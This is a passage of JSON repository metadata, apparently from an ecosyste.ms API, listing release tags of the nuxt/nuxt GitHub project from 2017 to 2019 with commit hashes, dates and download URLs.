1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.